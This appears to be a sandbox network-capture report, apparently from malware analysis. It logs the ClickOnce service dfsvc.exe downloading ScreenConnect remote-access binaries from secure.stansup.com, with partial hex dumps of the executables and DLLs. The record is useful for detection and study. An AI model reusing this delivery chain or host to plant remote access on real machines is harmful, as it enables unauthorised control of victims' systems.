                                                                                                                                                                                                                                                        6192.168.2.94972879.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC117OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:30 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        7192.168.2.94972979.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:32 UTC131OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:32 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 81696
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:32 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:32 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 9c 58 f1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 96 ab 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzX"0@^ `@ `@
                                                                                                                                                                                                                                                        2024-10-25 17:27:32 UTC16384INData Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 3c 7d b5 15 e6 e4 47 39 a8 2f df 51 21 71 d1 7d 7c b4 23 ff 20 aa 00 bc c6 ea 30 f6 ac ab 55 7c cb 13 b1 66 bd 7a 69 bd d1 74 04 f3 9e 32 ae b2 e1 88 de 6c a2 e7 df 05 2c 86 6e 6d 86 5d ac ab b4 f5 fc e8 bf af d9 ab 77 e1 9c 9d 9d 47 f8 bc 1f 97 32 ee 22 45 7e 53 a9 85 d4 74 40 81 47 46 8a 90 dd d2 c3 e6 60 69 82 ec 5a 08 9c b2 91 6b 34 e0 d0 8f ba 84 fe 4b 55 db 67 ae 56 73 fe 12 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07
                                                                                                                                                                                                                                                        Data Ascii: 452b-8975-74a85828d354TextState<}G9/Q!q}|# 0U|fzit2l,nm]wG2"E~St@GF`iZk4KUgVs{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff
                                                                                                                                                                                                                                                        Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16384INData Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16375INData Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: n


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        8192.168.2.94973079.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC119OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 197120
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:34 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1e 35 ea eb 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 5d ca 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5" 0 `]@
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC16384INData Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06
                                                                                                                                                                                                                                                        Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC16384INData Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06
                                                                                                                                                                                                                                                        Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC16384INData Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06
                                                                                                                                                                                                                                                        Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC16384INData Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC16384INData Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b
                                                                                                                                                                                                                                                        Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC16384INData Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61
                                                                                                                                                                                                                                                        Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC16384INData Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65
                                                                                                                                                                                                                                                        Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                        Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                        Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        9192.168.2.94973179.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC120OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 1721856
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:36 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 ae 85 b3 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 92 5c 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 a5 6f 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0>\ ` o@
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 00 0a 99 00 0c 00 00 00 00 02 00 81 00 24 a5 00 0c 00 00 00 00 02 00 73 00 7d f0 00 07 00 00 00 00 02 00 06 00 f1 f7 00 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 de 00 00 06 72 71 06 00 70 28 01 02 00 0a 0a 02 06 28 bb 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 bc 00 00 06 18 8d d6 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 02 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 03 02 00 0a 73 04 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0b 01 00 06 1f 0a 16 20 7c 4f 00 00 73 06 02 00 0a 28 6e 01 00 0a 2c 35 20 05 01 00 00 73 07 02 00 0a 0a 06 6f 08 02 00 0a 06 28 ea 01 00 06 0b 07 16 30 0b 28 c0 01 00 0a 28 c7 00 00 06 7a 06 16 07 6f 09 02
                                                                                                                                                                                                                                                        Data Ascii: $s}0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5 so(0((zo
